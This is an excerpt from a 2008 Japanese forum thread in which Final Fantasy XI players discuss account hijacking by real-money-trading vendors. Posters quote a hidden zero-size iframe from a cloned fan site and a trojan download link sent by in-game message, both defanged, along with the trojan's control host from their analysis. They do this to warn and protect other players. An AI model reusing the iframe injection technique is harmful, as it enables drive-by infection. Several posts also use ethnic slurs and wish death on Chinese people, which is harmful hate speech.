ウインドウズのアップデートもセキュリティソフトのチェックも随時行っ
ていました。
パスワードもハッキング直後と復元後に2回変更したし、インターネット
の検索もスクウェアFF公式HPぐらいしか見てないのに、どうしてこう
なってしまうのか全く分かりません。
それにしても前回と同じく、「プレイオンラインIDまたはプレイオンラ
インパスワードが違います」というメッセージが出て、今まさにキャラク
ターを操作してお金やアイテムを競売で奪っているのを分かっていながら、
インフォメーションセンターに「時間外」という理由で連絡すら出来ない
のが歯がゆくてなりません。
復元は1度しかしか出来ないということで、もう何を言っても「終わり」
なんですけどね・・・
710既にその名前は使われています:2008/09/19(金) 23:15:36 ID:P7fJg1k4
何も原因ないわけないだろー

1.ウィルスを隔離出来てなかった
2.ブログかどっかで罠URL踏んだ
711既にその名前は使われています:2008/09/19(金) 23:15:46 ID:uTtco0tC
>>704
FF用語辞典なんて所も信用なんて無い。
ってか、ネットにつなげてる時点で、
信用なんて目の前で自分で火をつけて燃やしてるようなものだからな。

因みに俺のPCにはウイルスソフトぐらいしか入れてないけど、一度もパスなんて抜かれた事が無い。
だって。そもそもFF入ってないんだぜwwwww
回線だって完全に別さあ!今のネット社会。これぐらいアタリマエだぜ!
712既にその名前は使われています:2008/09/19(金) 23:18:56 ID:uTtco0tC
>>710の言うとおりだな。
ってか、本当に被害にあったならまずテンプレよろ。
何処が悪かったかそれでいえると思うぜ。
713既にその名前は使われています:2008/09/19(金) 23:19:49 ID:SZzJKqwv

れて
ウ  ン
て    し
パ      ド
の        ク
な          の
そ            回
イ              違
タ                や
イ                  ン
の                    ん
復                      い




改行が変だったから見てみたけど、縦でも斜めでもないようだ
714既にその名前は使われています:2008/09/19(金) 23:24:38 ID:SPGdggI/
どうせまた、実はクリリンしてないwとか、FlashPlayer最新w(のつもり)とかだろ
715既にその名前は使われています:2008/09/19(金) 23:36:17 ID:t8Qk5HO1
>>713
おまえ無駄なことに労力かけるなよ・・・w
それはともかく隔離せずアップデートやらしたって無駄だわなぁ
716既にその名前は使われています:2008/09/19(金) 23:50:29 ID:bqFmZoA8
>>709
マズお前は間違いなくHDフォーマット・PCの初期化を怠っていたろう?
そしてパスワードも相変わらずPCに保存していたんだろう
717既にその名前は使われています:2008/09/19(金) 23:50:33 ID:mf6Cdvub
HDDとっかえた俺最強
718既にその名前は使われています:2008/09/19(金) 23:50:35 ID:MqeFg/Eh
どーせクリーンインスコもしてなくて 大丈夫^^ とか自分に言い聞かせたんだろうな。
719既にその名前は使われています:2008/09/20(土) 00:04:02 ID:C/i18cyW
おやすみ前のあげ。
720既にその名前は使われています:2008/09/20(土) 00:20:31 ID:uY1ubo99
被害者に冷たいスレになりました

・・・いつものことか
721既にその名前は使われています:2008/09/20(土) 00:22:26 ID:1r73rTCq
一回目は仕方ないにしても二回目はな
722608,680続き 1/2:2008/09/20(土) 00:22:28 ID:H+6B+i3P
ソースを上げてくださった方 ありがとうございます。
<!--履歴-->というコメントアウトの後</tr>と<td>の間に
<iframe width='0' height='0' src='http://www●geocities●jp/ff11seeds/gei.htm'></iframe>
というサイズ0のiframeがありました。

>>686さんのエラーメッセだと
Microsoft Access の脆弱性
http://www.microsoft.com/japan/security/bulletins/ms08-041e.mspx
BlackIceの脆弱性(なんでしょこれは IBMが昔出してたファイアウォールくらいしか思いつかないw)
を利用して ヤフメッセで送らせるって感じみたいですね。

RealPlayerの識別子があったというre11.htmはgei.htmに読み込まれてたのでしょうか。
indexページはオリジナルのソース丸パクで上記のiframeと自動挿入部分以外の相違点が見つからなかったので
思いつくのはcssファイルに仕込まれてた可能性くらいですが
どのようにして Atlas/re11.htmに飛ばされたのか気になります。
引き続き情報募集中です。
ジオ関連で補足続きます。
723既にその名前は使われています:2008/09/20(土) 00:24:07 ID:reZ+om+R
クリーンインストールしてなさそうだし、冷たくされてもしょうがない^^
7242/2:2008/09/20(土) 00:32:01 ID:H+6B+i3P
補足
ジオは自動挿入されるアクセス解析と広告にJSを使ってます。
ブラウザからソースをとると元サイトの広告と解析がはいります。
<!-- text below generated by server. PLEASE REMOVE --> ってコメントアウトされてるところです。
そのソースをそのまま偽サイトにアップしているので 偽サイトの分も自動挿入が入ってるんですね。
で 上部にはバナー広告2個分のスクリプトがあります。
いったんうぷって またブラウザからソース取った可能性もありますが
オリジナルの<body>位置が</head>より前にあるため自動挿入がバグってるのかもです。
下にアクセス解析3つ。これは広告に対応した数。
なのでスクリプト数はオリジナルよりかなり多くなっているわけです。

ジオのアカウントは同名のヤフーのアカウントがあると作れません。
ジオの/seedsというURLはヤフーのseedsというIDに優先権があります。
つまりヤフーのIDとしてまだ生きているseedsというアカウントを持っている人もしくはそのアカウントをハックした何者かが偽サイトを作りました。
最近は削除されてないので不明ですが以前は同一のURLを再使用することはできなかったかと思います。
ですが生きているIDなので今後ジオで別のサイトを作ることが可能です。コワス

725既にその名前は使われています:2008/09/20(土) 00:33:58 ID:aKcw1mT6
POLの起動時と終了時のエラー
Winアップデートできない
シャットダウンにえらい時間かかる
とかの症状なくてハック来た人っているの?
726611:2008/09/20(土) 00:34:09 ID:uY1ubo99
>>608(>>680>>722)

IFRAMEを見つけたのがジオに削除依頼をしたあとでしたので
gei.htmを確認しようとしたときは消されちゃってました・・・

なにぶんわたしのところには「感染しても安全な環境」がありませんので
もう侵入検知でてんぱっちゃって、わ〜わ〜あたふたしてましたから
適切な対応ができていなかったことをお詫びしておきますm(_ _)m
727既にその名前は使われています:2008/09/20(土) 00:37:38 ID:uY1ubo99
>>725
wzcsvbxm.dll ← こっちのウィルスは前兆現象が出るようですけど
Kernaeghdrv.dll ← こっちのほうはFFに関しては前兆現象は報告されてないと思います
728既にその名前は使われています:2008/09/20(土) 00:40:47 ID:Y6oHQQsn
2回目やられたひとはとりあえず2回目以降も復旧してもらえるように要望メール出したらいいんじゃないの
素人考えだけど復旧するには人件費が結構かかるはずだから「有料でもいいです」とか書き添えてさ
729既にその名前は使われています:2008/09/20(土) 00:45:07 ID:70xkkVug
flash player10を薦めている人がいる
英語なのに大丈夫かな
730既にその名前は使われています:2008/09/20(土) 00:55:53 ID:uY1ubo99
>>729
Flash Playerの10って確認できないんですけど、出てます?
731既にその名前は使われています:2008/09/20(土) 01:02:24 ID:H+6B+i3P
>>726 
私は個人的興味ってスタンスですし。
お詫びなさるようなことはなにもないかと。

サイトを丸パクするのは実はとても簡単なことなので
FF11のアカウントの問題としてだけではなくインターネットをする上で
丸パク+リダイレクトや罠スクリプトという実例を多くの方に知っていただけるということに意義があると思います。
なんかこいつエラソウなこといってますが【許してください。】 
今日は上げて寝ます。おやすみなさい。

732既にその名前は使われています:2008/09/20(土) 01:03:28 ID:H+6B+i3P
っと おまけ
FP10は ラボで落とせたかと。
安定版のリリースはまだじゃないでしょうか。
733既にその名前は使われています:2008/09/20(土) 01:08:52 ID:uY1ubo99
>>732
ありがとうございます
ラボで確認しました
734既にその名前は使われています:2008/09/20(土) 01:17:11 ID:QLMWPXsl
業者の宣伝メッセが来たって人、けっこういるのかな?今日俺んとこにも来たんだが。
差出人が「---」みたいになってた。
試しに自分のフレ宛にメッセを送る画面を開いて、自分の名前を「---」に変更しようとしたけど
出来なかった。
最近インしなくなったフレがいるんで、そいつがハクられて経由してきたのかな〜。
こっちがフレ削除しても向こうが消さない限り送られてくるのかな。
防ぎようがなくて気持ち悪い。
735既にその名前は使われています:2008/09/20(土) 01:25:25 ID:JlQLP77e
巻き戻しは1回限りだけど、アカウントの復帰は対応して貰えるのだよね?
巻き戻し中でよかったと考えるべきか。
736既にその名前は使われています:2008/09/20(土) 01:29:22 ID:cL3rl5vZ
>>734
ハックした奴のアドレス帳(フレ登録者)勝手に辿って
ダイレクトメール送ってくるのかw
フレをハックした奴からそんなもん送りつけてくるとかwwww
喧嘩売ってるか以前にまともじゃないよ、中華。

POLどっかやられたのかとおもったらそういうことなのか。
737既にその名前は使われています:2008/09/20(土) 01:46:51 ID:QLMWPXsl
>>736
>>226を見て、フレ経由なのかと想定。
別ハンドルの倉庫キャラにはメッセきてないんで、可能性高いかなと。

フレ経由で合ってたとしても、差出人名がへんてこな文字列になってたのは絶対変だよな。
一応STTには報告してみるか。
738既にその名前は使われています:2008/09/20(土) 02:18:54 ID:zw76i3zp
自分のとこにもきたけど、POLの自キャラ名と違うハンドル名の方にだけ
送られてきているからハックされたフレリストとかではなさそう。
もちろんそのハンドルでPOL上で他人とやり取りしたことはない。
業者はアドレス解析して送ってきてるんだと思う
739既にその名前は使われています:2008/09/20(土) 02:22:40 ID:zw76i3zp
GMコールしてみたところ
「フレンド登録メール送信の際にコメントを書き換えて送ってきている」
というような返信があった
740既にその名前は使われています:2008/09/20(土) 02:36:53 ID:uY1ubo99
フレ登録から送ってきてるなら、それだけハックされた人が多いというか
ハックされて泣き寝入りしてる人が多いというか、そういうことなのかな
741既にその名前は使われています:2008/09/20(土) 02:44:48 ID:WFcHy96Y
>>675の件。FFとは直接関係なさそうだが、チャンコロのメンタリティがよくわかる事例だと思う。
【国際】 「IT製品、ソースコード開示せよ」…中国が外国企業に要求へ★5
http://mamono.2ch.net/test/read.cgi/newsplus/1221836695/8

8 名前:名無しさん@九周年[] 投稿日:2008/09/20(土) 00:08:06 ID:+5EbIvak0
別ソース
http://www.csaj.jp/government/other/2008/080627_meti.html

社団法人コンピュータソフトウェア協会(CSAJ)のソースなので
ほぼ一次ソースだと言えます。

ちなみに対象の詳細です
http://www.csaj.jp/government/other/2008/080627_list.pdf
742既にその名前は使われています:2008/09/20(土) 02:45:34 ID:WFcHy96Y
対象の詳細↓

ファイヤーウォール
ランカード及びスイッチングハブ
VPN
ルータ
インテレジェントカード
ICチップ用OS
バックアップ及びリストアデータ
OS
データベースシステム
迷惑メール防止システム
不正アクセス侵入探知システム
ネットワーク監視システム
ログ収集、解析ソフト
ファイル改竄探知システム

どうみても不正アクセスする気満々です。本当にありがとうございました
743既にその名前は使われています:2008/09/20(土) 02:51:03 ID:uY1ubo99
>>741
ナマ貼りはよくないですよ
とくにPDFは安全が確認できないから開くのが怖い
744既にその名前は使われています:2008/09/20(土) 02:52:44 ID:WFcHy96Y
>>743
いいたいことはわかるけど、これぐらいはアドレスみて判断してくれよ・・・
745既にその名前は使われています:2008/09/20(土) 02:55:05 ID:uY1ubo99
>>744
そこが安全だと「あなた」が保障してくれるなら?
746既にその名前は使われています:2008/09/20(土) 02:57:24 ID:WFcHy96Y
ただのバカだった。
747既にその名前は使われています:2008/09/20(土) 02:58:02 ID:VfncLR3v
どっちも馬鹿だー
748既にその名前は使われています:2008/09/20(土) 02:58:16 ID:uY1ubo99
>>746
わたしはITMediaのニュースでさえナマ貼りは控えてますよ
なにが安全かがわからない状況になってきてますから、ナマは控えて
いただいたほうがいいと思います
749既にその名前は使われています:2008/09/20(土) 03:02:28 ID:WFcHy96Y
>>748
たぶん言ってもわからないだろうけど、最後にいっとくね。
CSAJソースと、ITMedia程度を比較しないでね。
750既にその名前は使われています:2008/09/20(土) 03:05:13 ID:uY1ubo99
>>749
だから、そういうあなた的視点の考え方が危ないと言っているんですけど
そこを話してもわからないようですからわたしもやめときます
751既にその名前は使われています:2008/09/20(土) 03:09:51 ID:VfncLR3v
もうやめて><
752既にその名前は使われています:2008/09/20(土) 03:11:41 ID:Pgp5fgQU
もうやめてー><
753既にその名前は使われています:2008/09/20(土) 03:20:51 ID:0yj/nKdl
754既にその名前は使われています:2008/09/20(土) 03:30:58 ID:dsQbmc5g
すべての人間がアドレスで判断できるとは限らないですよ
似たアドレスの罠サイトを踏まされる可能性もあるわけですし
>>744は自分基準で思いやりの欠片もないように見えました
垢ハクスレでは他に比べて特にみんな敏感になっているから直アドは自重するのがおすすめかもw
755既にその名前は使われています:2008/09/20(土) 03:32:46 ID:uY1ubo99
ジオサイトの偽物騒動があったばかりです
ナマ貼りが安全だという認識をほかに与えないようにしてください
「www.csaj.jp」が安全だという思い込みがあると、www.csajs.jpとか
「www.csaj_.jp」とか似せたURLが出てきたときに、それも安全だと
クリックしてしまう可能性は否定できません
テンプレには外部URLを踏むのは自己責任だと書きましたが、わざわざ
罠を作る(あるいは作らせる)必要はないと思います
756テンプレ改定:2008/09/20(土) 03:35:35 ID:uY1ubo99
■被害報告をされる方は被害報告用テンプレに沿って書き込みをお願いします
■外部リンクのナマ貼りは控えてください(偽物サイトへの誘導もありますので、飛ぶときはURLの確認を怠りなく)
■このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件39 ●● http://changi.2ch.net/test/read.cgi/ogame/1220731476/l50

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://www.geocities.jp/ff11warning/template/ (ttp://miku.xrea.jp/template/のミラーサイト)
  「一般テンプレ」に関してはこちらのサイトをご覧ください
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます)= ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け)= ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり)= ttp://ort.sakura.ne.jp/taisai/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)
757既にその名前は使われています:2008/09/20(土) 03:45:49 ID:P0ah4yVS
>>730
英語のRC版なら最近。
正式版じゃないからAdobe Labsページから。

ベータ/RC版をすすめるやつもどうかしてると思うけどね。
単に無責任な新しもの好きなだけか。
758既にその名前は使われています:2008/09/20(土) 03:49:43 ID:qIHQ0Rx3
ナマ貼りなんてオレ用語をテンプレに含められても困る。
脊髄反射で事を起こすにしても、もうちょっと推敲してからにしてくれ。
759既にその名前は使われています:2008/09/20(土) 03:51:18 ID:g1Lnq5sv
普通なら「直接リンク」「直リン」だよねぇ、表現としては
760テンプレ改定:2008/09/20(土) 03:58:43 ID:uY1ubo99
■被害報告をされる方は被害報告用テンプレに沿って書き込みをお願いします
■外部リンクをそのまま掲載する(直リンクを貼る)ことは控えてください
  ・似せたURLで偽物サイトへの誘導もありますので、外部リンクを踏むときは注意してください
■このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件39 ●● http://changi.2ch.net/test/read.cgi/ogame/1220731476/l50
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://www.geocities.jp/ff11warning/template/ (ttp://miku.xrea.jp/template/のミラーサイト)
  「一般テンプレ」に関してはこちらのサイトをご覧ください
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます)= ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け)= ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり)= ttp://ort.sakura.ne.jp/taisai/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)
761既にその名前は使われています:2008/09/20(土) 04:00:20 ID:0yj/nKdl
生生うるせーな馬鹿じゃねーの
たかだかh取る取らないでうるせーんだy

Jane使ってコマンドに
http://www.aguse.net/result1.php?url=$LINK
でも入れてろよ
762既にその名前は使われています:2008/09/20(土) 05:38:22 ID:uY1ubo99
203からあげ
763既にその名前は使われています:2008/09/20(土) 05:49:03 ID:gZutXPqa
一度ハッキングされても、その後のPOLIDはそのまんまだよね?
だとしたら、簡単なパス変更だと力技(数打ちゃ当たる方式)で破られてるってことはない?
ツ−ルとかあるかは知らないけどさ(3回打ち間違えたらロック掛かるとかなかったよね?)

仮想化して、FFとブラウジングとで切り分けするしかないかな
764既にその名前は使われています:2008/09/20(土) 06:17:31 ID:fH9tjXTX
怖かったのでPG2導入しました;;
難しかったです;;
765699:2008/09/20(土) 06:45:41 ID:zPGII5gj
パスワードを再発行してもらって、ソフトウェアキーボードで入力し
POLに接続。パスを数字、小文字、大文字の合せて15桁に変更。
キャラの被害確認してPOL落ちる前に再度パス変更。
巻き戻し依頼して昨日、POL入ろうとするまで一度もPOLには
繋いでいなかった。
巻き戻し完了のメール連絡は着てないけど、公的書類送って3週間は経つから
念のため再度新しいパス発行してもらうまで、アカウント凍結して貰ってた方が
いいのかな。


766既にその名前は使われています:2008/09/20(土) 07:11:34 ID:OhLV2mId
防げるのはキーロガーだけ
それ以外のウイルスに感染してるならIDとPassは海の向こうに行った。
767既にその名前は使われています:2008/09/20(土) 08:00:50 ID:m0S/8ikW
昨夜からなんか頻繁にPG2がブロックしてるんだが・・・なんなんだろう
58.19.24.200
60.190.218.40
61.191.58.178
124.49.93.220
124.90.200.158
124.115.211.22
218.15.62.78
221.0.186.14
222.187.221.86
768既にその名前は使われています:2008/09/20(土) 08:14:48 ID:SKfVvAjV
aguseで見てみただけだけど中国の色んな所からだねw
韓国が1個だけまじってたけど
769既にその名前は使われています:2008/09/20(土) 10:08:41 ID:2/F0O9/a
216
770既にその名前は使われています:2008/09/20(土) 10:44:14 ID:uuoQ1brA
夜中にくだらないことで言い合いをしてたと思ったら、それで一人で盛り上がって
勝手にテンプレ改訂かよ。しかも改定案じゃなくて、改訂決定。バカなの?死ぬの?
771既にその名前は使われています:2008/09/20(土) 10:48:11 ID:474D43d7
ナマ貼り云々言ってる人って専ブラ使ってないの?
Janeだと頭のh抜いたってリンクされるんだが
772既にその名前は使われています:2008/09/20(土) 10:49:35 ID:B3lJNa5r
差出人---のメッセージのことだけど
POL上から適当に探して送って
あと、その送った時に使ってたハンドルを削除したらそうならない?
773既にその名前は使われています:2008/09/20(土) 10:53:11 ID:k/XTQ6yf
>>734みたいな宣伝メールがうちのとこにも
例のごとく差出人が----で英文だた
無差別っていうか全ユーザーに送ってるんかな
774既にその名前は使われています:2008/09/20(土) 11:18:43 ID:aBbuG4nn
2垢もってるけどそーいうメルは来てないな〜
ただフレが少ない上に全員PS2使いだからかもしれんけどw
775既にその名前は使われています:2008/09/20(土) 12:51:37 ID:2xSQoEPW
保守

メアドは変更しても届くの?変更してないから届くの?
776既にその名前は使われています:2008/09/20(土) 13:42:38 ID:QLMWPXsl
>>772
なるほど〜。
その方法なら自分でも確認できるけど、やり方わかったところで根本的な解決にならないからなあ;;

>>774-775
メールじゃなくて、フレンドメッセージです。

>>773
こっちがハンドル変更したりフレ削除しても、向こうが登録してる限りオフラインでリストに載った
ままになるんだっけ?
誰ともフレ登録してない倉庫キャラに届いたという話も出てたので、無差別かもしれないし、防ぎ
ようがなさそうだなあ。
気持ち悪いだけで実害はないけど、なんかやだよね。
777既にその名前は使われています:2008/09/20(土) 14:47:55 ID:zw76i3zp
>>776
自分のとこにきたヤツの宛先が、自キャラとリンクさせてないPOL上だけのハンドルへだったので
ヴァナ上のPCに対してではなくPOLのアカウントに対して送ってきてるんだと思う
>>774
フレ登録申し込んだときに相手に「フレンドになろうよ!」って送られてくるコメントを
ああいう風に書き換えているわけ
おそらくツールでハンドル名ランダム総当りで探り当てて送信して言ってるんだと思う
778既にその名前は使われています:2008/09/20(土) 15:29:34 ID:tl65gxHd
ランダムなら18ハンドル作ってる俺んとこにも届きそうなもんだけど来てないよ
779既にその名前は使われています:2008/09/20(土) 15:43:40 ID:zw76i3zp
>>778
単に見つけられてないだけだろう
業者向こうの人間だから、向こうにわかるような名前とかでないとでてこないんじゃないかな
780既にその名前は使われています:2008/09/20(土) 16:35:50 ID:TzmYYGK1
ABCD1234みたいなデフォの奴に送ってんじゃね?
781既にその名前は使われています:2008/09/20(土) 17:11:25 ID:znu3xel5
以前、リンクシェル絡みで何か流出してなかったっけ?

例のオークションサイトのキャラ詳細みたいなのもどうやって抜いて?るんだろ
本人が登録してるのかな
フレのキャラ名のリンクまである
782既にその名前は使われています:2008/09/20(土) 17:29:45 ID:reZ+om+R
259からあげ
783既にその名前は使われています:2008/09/20(土) 18:39:06 ID:20ELIdSw
202から上げ
784既にその名前は使われています:2008/09/20(土) 19:43:35 ID:x8clkbxd
age
785既にその名前は使われています:2008/09/20(土) 20:45:39 ID:aBbuG4nn
上へ参りまぁす
786既にその名前は使われています:2008/09/20(土) 20:50:33 ID:4JkEBbda
知り合いがアカハクくらったので代理でGMコール
FF内からコール>「最終ログイン時間と全てのキャラ名、ワールド添えてPOLからコールしてください」
情報添えてPOLからコール>「最終ログイン時間が日と曜日しかないので判断できません」
POLから再コール>凍結しました、と一方的に通知が来て終了

長い時間まったんだから、日付くらい確認しにチャットに応じてくれてもいいと思うのだが…。

とりあえず代理コールはこんな感じでできた。
787既にその名前は使われています:2008/09/20(土) 20:52:02 ID:1r73rTCq
>>786
乙だけど本人確認の条件はあんまりここに明記しないほうがいいかもだ
788既にその名前は使われています:2008/09/20(土) 21:14:42 ID:3LfsuaJ5
RMTメッセは、POLサーチでAから順番に送ってるだけじゃない?
/anon してないと、サーチひっかかるし。
789既にその名前は使われています:2008/09/20(土) 21:24:13 ID:uhqL65UJ
今朝anonしてたけど名無しメッセが届きました。
友達になろうよ!だけのメッセでしたが
プロフィールは公開してないので、趣味が同じ等の理由で
フレ登録がくるような状況ではないのです。
GMコールしてみたところ、名無しはPOL上から登録を
申し込んだのだろう。RMTに関する情報としてSTTへ報告を
してもらえると幸いであるとのことでした(要約してあります)

受信拒否することでこちらが不利益になる情報は渡らないと
言われましたが、やっぱり気味が悪いですね。
うっかりメッセならいいけど、それならネーム名前消さないよね…。
790既にその名前は使われています:2008/09/20(土) 23:28:52 ID:qEHAWLNM
age
つかsage荒らし来てるのかね?
お気に入りのスレがいくつもいきなり落ちてるw
791既にその名前は使われています:2008/09/20(土) 23:36:50 ID:1r73rTCq
>>790
スレ保持数の関係で定期的にスレ番300まで圧縮されてるんじゃないかな?
792既にその名前は使われています:2008/09/20(土) 23:41:13 ID:U8Cd4yl0
sageと落ちるのに何が関係あるのかわからない
793既にその名前は使われています:2008/09/20(土) 23:46:40 ID:gU1vtPer
>>790
ID:iXjUQ91d だな

>>792
目立たないようにsageながら大量のスレを保守する奴がいる
794既にその名前は使われています:2008/09/20(土) 23:59:11 ID:2xSQoEPW
>>792
新たな書き込みを見る事で賑わっている、と判断し保守ageを怠る事を期待したsage進行。
795既にその名前は使われています:2008/09/21(日) 01:32:14 ID:JR9zXrVl
おやすみ前の217からあげ
796既にその名前は使われています:2008/09/21(日) 01:56:10 ID:/kS80AVD
PS2使いだけど昨日初めて英語のRMT広告みたいなのがPOLにきたな。
かなりびびった。
797既にその名前は使われています:2008/09/21(日) 02:42:31 ID:VrkGexcy
先ほどゲーム内で見知らぬキャラからtellがきました。

内容は
???????>>I Quit... http://www■geocities■com/tempupload77/ffxiwarper.zip Enjoy
というものでした(送り主の名前は?で伏せ、URL内のドットは全て■にしました)

送り主に返信しても離席設定で届かず暫くするとサーチにかからなくなり
怪しさ全開なのですが。

ハックやウィルスに詳しい方 お暇でしたら上記URLを閲覧するとどうなるか教えていただけませんでしょうか?
798既にその名前は使われています:2008/09/21(日) 02:43:04 ID:SruM6EHv
業者くさいのからtellが来て、URLが乗ってた。
こんなの飛ぶ奴はいないと思うけど、多分アカハック系だと思う。
フレにも数人来てた。
必要だったらURL転載するけど、とりあえず自重。
799既にその名前は使われています:2008/09/21(日) 02:44:10 ID:SruM6EHv
>>797
これとまったく同じだ。
鯖はどこ?こっちは狼。
800既にその名前は使われています:2008/09/21(日) 02:49:39 ID:VrkGexcy
>>799
同じく狼です こわいねぇ

zipの前のコロンを■にし忘れていました ごめんなさい。
801既にその名前は使われています:2008/09/21(日) 03:04:19 ID:2Oie9f1/
>>797
zipの中身はffxiwarper.exeというファイル1個で、Avast!でWin32 Trojan:Genが検出された。

具体的にどうなるかは試してない。
802既にその名前は使われています:2008/09/21(日) 03:09:57 ID:VrkGexcy
>>801
情報ありがとうございます。
見知らぬ人物からのオススメURLでトロイ検出は
ネトゲ関連のトロイと考えていれば怪我はなさそうですね。
803既にその名前は使われています:2008/09/21(日) 03:18:34 ID:jD6Yw3lm
ffxiwarper.zipをVirusTotalに投げた結果
ttp://www.virustotal.com/analisis/0f50667074d177c5de36adf4028dcb62

中のexeをstringsしたらffxiserver77.no-ip.orgという文字列があった。
これはアメリカにあるホスト。
804既にその名前は使われています:2008/09/21(日) 03:22:14 ID:QKbSkeMh
俺も狼ですが、鯖スレやまわりのフレにもまったく同じ文章が送られており
頭文字が後半の自分にも送られてきたため、かなりの人数に送られていると思います

他鯖のかたも注意されたし
805既にその名前は使われています:2008/09/21(日) 03:23:30 ID:QKbSkeMh
「鯖スレ」→「鯖スレ住人」に訂正
806既にその名前は使われています:2008/09/21(日) 03:23:45 ID:LzgbETIY
もはや何でもありだな。MMO運営するのも大変だなこりゃ。
807既にその名前は使われています:2008/09/21(日) 03:24:30 ID:VrkGexcy
>>803
情報ありがとうございます。
ハックした内容をそこへ送るとかでしょうね。

上記URLにアクセスしないのが一番ですね。
808既にその名前は使われています:2008/09/21(日) 03:29:14 ID:LQ8JD8Zi
どうせ中国人だろ?ホントにトラブルしか起こさない連中だな。
一人残らず死んでほしい。
809既にその名前は使われています:2008/09/21(日) 03:36:29 ID:Z90sZbBS
最近シナ畜業者も露骨になってきたな〜
焦ってるのかね?
810797:2008/09/21(日) 03:36:44 ID:VrkGexcy
情報のお寄せありがとうございました。
業者の根絶を祈りつつ、これから寝ることにします。

ではまた。
811既にその名前は使われています:2008/09/21(日) 07:05:36 ID:QS4Art6L
age
812既にその名前は使われています:2008/09/21(日) 07:18:03 ID:4VWPi9V8
>>809
規制も厳しくなってるしなぁ
一般の客は今後更に危険にさらされる機会が増える、一層セキュリティには気をつけないとね。
スクエニもこれまで以上のスピードで対応しないと俺らが困るw
最近はスクエニもユーザー本意の対応になってきただろうか?
地震など災害への対応も日々怠りなく。
813既にその名前は使われています:2008/09/21(日) 10:02:54 ID:QOwb+w9l
LS内で2名ほど、RMTサイトからフレンド登録しませんか?
とのメールが来てたとの報告が。
新手のアカハックでしょか?
差出人は−−−−になってるそうです。
814既にその名前は使われています:2008/09/21(日) 10:25:51 ID:QOwb+w9l
失礼しました。すでに上がってたようですね、
たぶん同じ業者からのメールですね。
ちなみに爺鯖です。
815既にその名前は使われています:2008/09/21(日) 11:05:56 ID:qeovS2WG
テルきたりメッセきてる=垢ハックされた!?ではない。
されてないから安心しろ。
気持ち悪いのはたしかだけど。
816既にその名前は使われています:2008/09/21(日) 11:09:29 ID:krOOkH8X
一人暮らしの女子大生のところに、ハァハァ(;´Д`)電話がかかってくるようなものだと
思えばいい。
817既にその名前は使われています:2008/09/21(日) 12:28:22 ID:h0ZvgzpO
>>816
それは絶対嫌です
818既にその名前は使われています:2008/09/21(日) 12:45:08 ID:1jk5dKIb
業者「お前のIDとパスよこせよ(;´Д`)ハァハァ」
819既にその名前は使われています:2008/09/21(日) 13:07:55 ID:FZ8DTlzw
>>818
フイタwww
820既にその名前は使われています:2008/09/21(日) 15:32:21 ID:UiWLhQw4
247
ここが賑わってないのはいいことだ
821既にその名前は使われています:2008/09/21(日) 17:21:55 ID:0RFZ2r2m
あげ
822既にその名前は使われています:2008/09/21(日) 19:17:02 ID:1t848tQI
254サルベんジ
823既にその名前は使われています:2008/09/21(日) 19:20:58 ID:0RFZ2r2m
>>797 米ジオのアカウントでtopページなし。
yohoo.comにabuse report送っときました。
no-ip.orgはDDNSサービス
ffxiserver77.no-ip.orgはアクセスできなくなってて実際のIP不明
沈静化してるのか飛び石連休でみんなお出かけなのかw
静かなのはいいことだ ハァハァ
824既にその名前は使われています:2008/09/21(日) 21:08:01 ID:WeiWpL4i
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(後編)
ttp://plusd.itmedia.co.jp/games/articles/0809/19/news078.html
読んだよ
825既にその名前は使われています:2008/09/21(日) 21:15:22 ID:4VWPi9V8
>>823
国内向けのハックよりもユーザーが多くリスクがより少ない北米などにターゲット変えたのではないでしょうか?
海外の攻略サイト見てる人はこれから要注意ですね。
826既にその名前は使われています:2008/09/21(日) 22:09:34 ID:Pm7oIwCl
アメリカにやったら仕返し何されるかw
827既にその名前は使われています:2008/09/21(日) 23:00:47 ID:WeiWpL4i
fc2アクセス解析レンタルしたまま忘れてました
今日みたらアクセス最大ページ数120ページまでなのに
1000個も知らないページが登録してありました
ハックですか?
828既にその名前は使われています:2008/09/21(日) 23:14:15 ID:ddgdEnw8
おやすみ前のあげ。
829既にその名前は使われています:2008/09/21(日) 23:58:33 ID:VnB6isqG
age
830既にその名前は使われています:2008/09/22(月) 00:39:49 ID:YWZ3zaew
>>825
米でやるほうがリスクが大きいっしょ
